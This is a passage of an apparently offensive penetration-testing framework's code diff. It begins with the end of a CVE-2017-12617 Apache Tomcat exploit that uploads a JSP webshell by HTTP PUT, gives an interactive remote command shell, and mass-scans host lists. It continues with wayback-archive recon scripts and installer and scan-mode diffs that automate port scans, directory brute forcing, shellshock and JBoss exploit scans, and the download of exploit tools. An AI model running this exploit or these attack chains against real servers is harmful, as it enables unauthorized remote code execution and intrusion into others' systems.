<pre><%=output %></pre>"""
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
requests.packages.urllib3.disable_warnings()
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False)
def shell(url,f):
while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=raw_input("$ ")
payload={'cmd':cmd}
if cmd=="q" or cmd=="Q":
break
requests.packages.urllib3.disable_warnings()
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False)
re=str(re.content)
t=removetags(re)
print t
#print bcolors.HEADER+ banner+bcolors.ENDC
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
print(parse.usage)
exit(0)
else:
if opt.U!=None and opt.P==None and opt.L==None:
print bcolors.OKGREEN+banner+bcolors.ENDC
url=str(opt.U)
checker="Poc.jsp"
print bcolors.BOLD +"Poc Filename {}".format(checker)
createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
else:
print 'Not Vulnerable to CVE-2017-12617 '
elif opt.P!=None and opt.U!=None and opt.L==None:
print bcolors.OKGREEN+banner+bcolors.ENDC
pwn=str(opt.P)
url=str(opt.U)
print "Uploading Webshell ....."
pwn=pwn+".jsp"
RCE(str(url)+"/",pwn)
shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None:
print bcolors.OKGREEN+banner+bcolors.ENDC
w=str(opt.L)
f=open(w,"r")
print "Scaning hosts in {}".format(w)
checker="Poc.jsp"
for i in f.readlines():
i=i.strip("\n")
createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"

47
bin/waybackrobots.py Normal file
View File

@ -0,0 +1,47 @@
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
results = r.json()
if len(results) == 0: # might find nothing
return []
results.pop(0) # The first item is ['timestamp', 'original']
return results
def getpaths(snapshot):
url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1])
robotstext = requests.get(url).text
if 'Disallow:' in robotstext: # verify it's acually a robots.txt file, not 404 page
paths = re.findall('/.*', robotstext)
return paths
return []
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage:\n\tpython3 waybackrobots.py <domain-name>')
sys.exit()
host = sys.argv[1]
snapshots = robots(host)
print('Found %s unique results' % len(snapshots))
if len(snapshots) == 0:
sys.exit()
print('This may take some time...')
pool = Pool(4)
paths = pool.map(getpaths, snapshots)
unique_paths = set()
for i in paths:
unique_paths.update(i)
filename = '%s-robots.txt' % host
with open(filename, 'w') as f:
f.write('\n'.join(unique_paths))
print('[*] Saved results to %s' % filename)

35
bin/waybackurls.py Normal file
View File

@ -0,0 +1,35 @@
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
r = requests.get(url)
results = r.json()
return results[1:]
if __name__ == '__main__':
argc = len(sys.argv)
if argc < 2:
print('Usage:\n\tpython3 waybackurls.py <url> <include_subdomains:optional>')
sys.exit()
host = sys.argv[1]
with_subs = False
if argc > 3:
with_subs = True
urls = waybackurls(host, with_subs)
json_urls = json.dumps(urls)
if urls:
filename = '%s-waybackurls.json' % host
with open(filename, 'w') as f:
f.write(json_urls)
print('[*] Saved results to %s' % filename)
else:
print('[-] Found nothing')

View File

@ -23,7 +23,7 @@ LOOT_DIR=/usr/share/sniper/loot
PLUGINS_DIR=/usr/share/sniper/plugins
GO_DIR=~/go/bin
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue? (Hit Ctrl+C to exit)$RESET"
read answer
mkdir -p $INSTALL_DIR 2> /dev/null
@ -38,16 +38,16 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install python3-uritools python3-paramiko nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb xsltproc
apt-get install waffit 2> /dev/null
apt-get install libssl-dev 2> /dev/null
apt-get remove python3-pip
apt-get install python3-pip
apt-get update
apt-get install -y python3-uritools python3-paramiko nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix sslyze arachni aha libxml2-utils rpcbind cutycapt host whois dnsrecon curl nmap php php-curl hydra wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb xsltproc
apt-get install -y waffit 2> /dev/null
apt-get install -y libssl-dev 2> /dev/null
apt-get remove -y python3-pip
apt-get install -y python3-pip
pip install dnspython colorama tldextract urllib3 ipaddress requests
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
gem install aquatone
gem install rake
gem install ruby-nmap net-http-persistent mechanize text-table
gem install public_suffix
@ -63,12 +63,8 @@ mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
mkdir -p $GO_DIR 2> /dev/null
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
git clone https://github.com/1N3/BruteX.git
git clone https://github.com/1N3/Goohak.git
git clone https://github.com/1N3/XSSTracer.git
git clone https://github.com/1N3/MassBleed.git
git clone https://github.com/1N3/SuperMicro-Password-Scanner
git clone https://github.com/1N3/BlackWidow
cp /usr/share/sniper/plugins/BlackWidow/blackwidow /usr/bin/blackwidow
cp /usr/share/sniper/plugins/BlackWidow/injectx.py /usr/bin/injectx.py
@ -85,9 +81,6 @@ git clone https://github.com/jekyc/wig.git
git clone https://github.com/rbsec/dnscan.git
git clone https://github.com/nmap/nmap.git
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
git clone https://github.com/1N3/CVE-2018-15473-Exploit.git ssh-enum
git clone https://github.com/leapsecurity/libssh-scanner.git
pip install -r $PLUGINS_DIR/libssh-scanner/requirements.txt
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
unzip slurp.zip
rm -f slurp.zip
@ -95,15 +88,13 @@ cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/
cd ~/go/bin;go get -u github.com/OWASP/Amass/cmd/amass; mv amass /usr/local/bin/
cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
cd $PLUGINS_DIR
wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
wget https://raw.githubusercontent.com/f3d0x0/GPON/master/gpon_rce.py -O /usr/share/sniper/bin/gpon_rce.py
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh
cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt
mv ~/.sniper.conf ~/.sniper.conf.old 2> /dev/null
cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null
cd $PLUGINS_DIR/BruteX/ && bash install.sh 2> /dev/null
cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt 2> /dev/null
cd $PLUGINS_DIR/CMSmap/ && pip3 install . && python3 setup.py install
cd $PLUGINS_DIR/nmap/ && ./configure && make && make install
#cd $PLUGINS_DIR/nmap/ && ./configure && make && make install
cd $INSTALL_DIR
mkdir $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
@ -111,33 +102,13 @@ mkdir $LOOT_DIR/nmap -p 2> /dev/null
mkdir $LOOT_DIR/domains -p 2> /dev/null
mkdir $LOOT_DIR/output -p 2> /dev/null
mkdir $LOOT_DIR/reports -p 2> /dev/null
cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
chmod +x $INSTALL_DIR/sniper
chmod +x $INSTALL_DIR/bin/dnsdict6
chmod +x $PLUGINS_DIR/Goohak/goohak
chmod +x $PLUGINS_DIR/XSSTracer/xsstracer.py
chmod +x $PLUGINS_DIR/MassBleed/massbleed
chmod +x $PLUGINS_DIR/MassBleed/heartbleed.py
chmod +x $PLUGINS_DIR/MassBleed/openssl_ccs.pl
chmod +x $PLUGINS_DIR/MassBleed/winshock.sh
chmod +x $PLUGINS_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
chmod +x $PLUGINS_DIR/testssl.sh/testssl.sh
rm -f /usr/bin/sniper
rm -f /usr/bin/goohak
rm -f /usr/bin/xsstracer
rm -f /usr/bin/findsploit
rm -f /usr/bin/copysploit
rm -f /usr/bin/compilesploit
rm -f /usr/bin/massbleed
rm -f /usr/bin/dirsearch
ln -s $INSTALL_DIR/sniper /usr/bin/sniper
ln -s $PLUGINS_DIR/Goohak/goohak /usr/bin/goohak
ln -s $PLUGINS_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
ln -s $PLUGINS_DIR/Findsploit/findsploit /usr/bin/findsploit
ln -s $PLUGINS_DIR/Findsploit/copysploit /usr/bin/copysploit
ln -s $PLUGINS_DIR/Findsploit/compilesploit /usr/bin/compilesploit
ln -s $PLUGINS_DIR/MassBleed/massbleed /usr/bin/massbleed
ln -s $PLUGINS_DIR/testssl.sh/testssl.sh /usr/bin/testssl
ln -s $PLUGINS_DIR/dirsearch/dirsearch.py /usr/bin/dirsearch
msfdb init
echo -e "$OKORANGE + -- --=[Done!$RESET"

View File

@ -7,7 +7,6 @@ if [ "$MODE" = "discover" ]; then
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/ips 2> /dev/null
mkdir $LOOT_DIR/ips 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null

View File

@ -73,13 +73,15 @@ if [ "$MODE" = "flyover" ]; then
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null &
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null &
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
else
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null &
cutycapt --url=https://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null &
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
fi
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
i=$((i+1))
if [ "$i" -gt "20" ]; then
i=0
@ -112,6 +114,7 @@ if [ "$MODE" = "flyover" ]; then
echo -n "$PORT "
done
echo ""
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
done
fi
exit

View File

@ -26,26 +26,35 @@ if [ "$MODE" = "fullportonly" ]; then
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
if [ -z "$PORT" ]; then
#nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
nmap -vv -sT -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
nmap -Pn -A -v -sV -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -A -v -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml >> $LOOT_DIR/nmap/nmap-$TARGET.txt
nmap -Pn -A -v -sV -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DONE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
loot
exit
fi

View File

@ -7,10 +7,14 @@ else
echo -e "$OKRED RUNNING FULL PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
#nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
nmap -vv -sT -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
nmap -vv -sT -sV -O -A -T4 -oX $LOOT_DIR/nmap/nmap-$TARGET.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
nmap -Pn -sU -sV -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml | tee $LOOT_DIR/nmap/nmap-$TARGET-udp
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
fi

File diff suppressed because it is too large Load Diff

View File

@ -1,136 +1,250 @@
if [ "$MODE" = "web" ];
then
if [ "$PASSIVE_SPIDER" = "1" ]; then
if [ "$MODE" = "web" ]; then
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
echo ""
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 3 -s y -v y
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
blackwidow -u http://$TARGET:80 -l 3 -s y -v n
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET --disable-tls-checks
echo ""
wpscan --url http://$TARGET/wordpress/ --disable-tls-checks
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET
echo ""
cmsmap http://$TARGET/wordpress/
echo ""
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p 80 -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpa.txt
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpb.txt
echo ""
fi
if [ "$NIKTO" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
fi
if [ "$SHOCKER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
fi
if [ "$JEXBOSS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
